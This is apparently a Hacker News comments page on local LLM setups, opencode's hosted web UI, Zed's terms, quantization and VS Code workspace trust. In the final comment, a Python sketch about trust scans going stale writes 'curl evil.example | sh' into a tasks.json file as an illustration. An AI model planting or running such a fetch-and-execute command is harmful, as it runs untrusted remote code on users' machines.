Hacker News | nacs's comments

You should really look at the 2nd link; it's much worse than telemetry:

> opencode will proxy all requests internally to https://app.opencode.ai

> There is currently no option to change this behavior, no startup flag, nothing. You do not have the option to serve the web app locally, using `opencode web` just automatically opens the browser with the proxied web app, not a true locally served UI.

> https://github.com/anomalyco/opencode/blob/4d7cbdcbef92bb696...


That is the address of their hosted WebUI, which connects to an OpenCode server on your localhost. It would be nice if there were an option to self-host it, but it is nowhere near as bad as "proxying all requests".

It looks like the author has kept it updated since then.

They mention the "Qwen3.5 (35B)" model, for example, which was released around two weeks ago.


For some anecdata, I set up Qwen3.5 on an RX 7900 XTX last weekend. It runs fine; I tried some simple coding prompts and got responses in 15-30 seconds. It's my first foray into running models locally, just to see what's possible, and I'm pleasantly surprised so far.

Also, the entire setup was done through Codex. I asked Codex to figure out how to run models locally given my architecture (Ubuntu, AMD GPU). It told me which steps to apply and I hit zero snags.
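For anyone curious what that setup ultimately boils down to: most local runners (llama.cpp's llama-server, Ollama, LM Studio) expose an OpenAI-compatible chat endpoint on localhost, so talking to the model is just one HTTP POST. A minimal sketch in Python; the port and model name below are placeholders for whatever your local setup actually uses:

```python
import json
import urllib.request

# Sketch, assuming a local OpenAI-compatible server (e.g. llama-server or
# Ollama). Host/port and model name are assumptions, not fixed values.
def build_chat_request(prompt, model="qwen3.5", host="http://127.0.0.1:8080"):
    body = json.dumps({
        "model": model,
        "messages": [{"role": "user", "content": prompt}],
    }).encode()
    return urllib.request.Request(
        f"{host}/v1/chat/completions",
        data=body,
        headers={"Content-Type": "application/json"},
    )

req = build_chat_request("Write a binary search in Python.")
print(req.full_url)  # http://127.0.0.1:8080/v1/chat/completions
```

With a server actually running, `urllib.request.urlopen(req)` would return the completion JSON.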


LosslessCut has both an HTTP API and a CLI, so it could be controlled via a lightweight TUI if someone wanted.


They may, but note that this isn't an official Newgrounds project - this is just a user ("Bill") posting on his own Newgrounds blog that he made this (it's not Newgrounds' official blog).


I meant Newgrounds the community.


Yep, the email they sent out is terribly worded, so it looks like the age requirement is for Zed itself.

Their actual blog ( https://zed.dev/blog/terms-update ) says the age requirement is only for their AI service (still not the best wording but a little clearer):

> Age requirement. You must be 18 or older to use Zed's AI-enabled software-as-a-service offering (the "Service").


This still sounds odd. Where is this restriction coming from?


It has binding arbitration. I assume/hope you must be an adult to sign away your right to sue.


Speculation I've seen is that whatever LLM they're reselling has this requirement itself and they need to pass it along.

I had expected this to be about their multi-user editing and chat features.


> I really hope more people realize that local LLMs are where it's at

No worries, the AI companies thought ahead - by sending GPU, RAM, and now even hard drive prices through the roof, you won't have a computer to run a local model on.


What model and hardware powers this?

Is this a Google T5 based model?


3bit hard-wired Llama 3.1 8B ( https://taalas.com/the-path-to-ubiquitous-ai/ )


3-bit is a bit ridiculous. From that page I am unclear whether the current model is 3- or 4-bit. If it's 4-bit… well, NVIDIA showed that a well-organized model can perform almost as well as 8-bit.
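To make the 3- vs 4-bit gap concrete, here is a toy symmetric round-to-nearest quantizer (purely illustrative - not Taalas's or NVIDIA's actual scheme, which are more sophisticated): 3 bits leave only a handful of representable weight levels, so the rounding error per weight is much larger than at 4 or 8 bits.

```python
# Toy round-to-nearest quantization; a simplification of real schemes.
def quantize(weights, bits):
    levels = 2 ** (bits - 1) - 1           # e.g. 3 levels per sign at 3-bit
    scale = max(abs(w) for w in weights) / levels
    return [round(w / scale) * scale for w in weights]

w = [0.11, -0.42, 0.73, -0.05, 0.98]
for bits in (3, 4, 8):
    q = quantize(w, bits)
    worst = max(abs(a - b) for a, b in zip(w, q))
    print(bits, [f"{x:.2f}" for x in q], f"max err {worst:.3f}")
```

On this tiny example the maximum error shrinks monotonically as the bit width grows, which is the whole argument for 4-bit over 3-bit.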


Works fine for me in Firefox 147.


Local models are quite capable. Obviously a 4B model isn't going to do the job of a trillion-parameter SOTA model, but there are many local models that are both fast and very usable for these agentic flows.

Qwen 30B and GLM Flash (also around 30B) are both very good for example and I use them regularly.


Thanks for being part of the discussion. Almost every response from you in this thread, however, comes off as an unyielding "we decided this and it's 100% right".

In light of this vulnerability, the team may want to revisit some of the assumptions that were made.

I guarantee the majority of people who see a giant modal covering what they're trying to do will just do whatever gets rid of it - i.e., see the title bar that says "Trust this workspace?" and hit the big blue "Yes" button just to get to work.

With AI and agents, there are now a lot of non-dev "casual" users using VS Code because they saw something in a YouTube video, and they have no clue what dangers they could face just by opening a new project.

Almost no one is going to read some general warning about how it "may" execute code. At the very least, scan the project folder and mention what will be executed (if it contains anything).


Didn't mean to come off that way; I know a lot of the decisions that were made. One thing I've taken from this is that we should probably open `/tmp/`, `C:\`, `~/`, etc. in restricted mode without asking the user. But many of the proposed solutions, like opening everything in restricted mode, I highly doubt would ever happen, as they would add further confusion, be a big change to the UX, and so on.

With AI, the warning needs to appear somewhere; the user would either ignore it when opening the folder or ignore it when engaging with agent mode.


> Almost noone is going to read some general warning about how it "may" execute code. At the very least, scan the project folder and mention what will be executed (if it contains anything).

I'm not sure this is possible, or at least not misleading, at the time of granting trust, because adding or updating extensions, or changing any content in the folder after trust is granted, can change what will be executed.
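The staleness problem can be sketched in a few lines. The `tasks.json` scanner below is hypothetical, purely to illustrate that a trust-time scan is a point-in-time snapshot of the folder:

```python
import json
import os
import tempfile

# Hypothetical scanner: returns the shell commands a VS Code-style
# tasks file in the workspace would run.
def scan_for_tasks(workspace):
    path = os.path.join(workspace, ".vscode", "tasks.json")
    if not os.path.exists(path):
        return []
    with open(path) as f:
        return [t["command"] for t in json.load(f).get("tasks", [])]

workspace = tempfile.mkdtemp()
os.makedirs(os.path.join(workspace, ".vscode"))

# At the moment trust is granted, the scan finds nothing suspicious.
assert scan_for_tasks(workspace) == []

# Afterwards the folder changes (git pull, extension update, agent edit...)
# and the result that was shown to the user is now stale.
with open(os.path.join(workspace, ".vscode", "tasks.json"), "w") as f:
    json.dump({"tasks": [{"command": "curl evil.example | sh"}]}, f)

print(scan_for_tasks(workspace))  # the trust dialog never saw this command
```

So a scan could only ever be advisory, not a guarantee of what the workspace will execute later.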

